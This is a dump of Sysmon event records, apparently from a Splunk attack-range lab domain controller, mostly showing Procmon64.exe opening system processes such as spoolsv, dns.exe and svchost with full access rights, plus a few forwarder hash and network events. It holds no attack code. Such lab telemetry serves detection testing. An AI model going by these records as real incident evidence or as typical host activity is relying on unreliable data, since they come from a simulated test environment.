10:52:00.849{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F132-6215-3800-000000003802}3484C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288801Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:00.823{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F132-6215-3800-000000003802}3484C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288800Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:00.821{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F131-6215-3400-000000003802}3248C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288799Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:00.734{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F131-6215-3400-000000003802}3248C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288798Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:00.732{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F130-6215-3200-000000003802}2628C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288797Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:00.713{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F130-6215-3200-000000003802}2628C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288796Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:00.712{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F130-6215-3100-000000003802}2568C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288795Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:00.678{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F130-6215-3100-000000003802}2568C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288794Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:00.672{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F130-6215-2F00-000000003802}2588C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288793Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:00.645{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F130-6215-2F00-000000003802}2588C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288792Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:00.644{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288791Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:00.573{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288790Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:00.570{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F130-6215-2D00-000000003802}2496C:\Program Files\TightVNC\tvnserver.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288789Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:00.527{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F130-6215-2D00-000000003802}2496C:\Program Files\TightVNC\tvnserver.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288788Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:00.525{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288787Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:00.419{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288786Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:00.416{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F130-6215-2B00-000000003802}2012C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288785Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:00.360{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F130-6215-2B00-000000003802}2012C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288784Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:00.357{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F130-6215-2700-000000003802}2948C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000288783Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:00.334{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC87E015C916F0E7BBE7351ECFC75550,SHA256=25D1B5008F444B26DC13CD79E9308B76FDCF3B427D9B8261F0850A69A59D154D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288782Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:00.325{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEFF5853D531849D679F95C75B6ED80D,SHA256=AC25CEE8BA864C6F320DFC116D0DE7A0EA473E1F0657EEC0A88C0B5BBA893CCB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000288781Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:00.309{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F130-6215-2700-000000003802}2948C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288780Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:00.300{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F130-6215-2600-000000003802}2884C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000216889Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:57.613{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51355-false10.0.1.12-8000- 10341000x8000000000000000288779Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:00.049{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F130-6215-2600-000000003802}2884C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288778Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:00.025{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F129-6215-2300-000000003802}2720C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000216892Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:01.314{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B215DBE0C7338A101D928FB62CC3605,SHA256=13FE20144DD7C52ED5150D86A74E3838AEF2F1ACBD0006BE3AB4163949C6CFAE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000288831Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:01.971{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288830Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:01.971{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 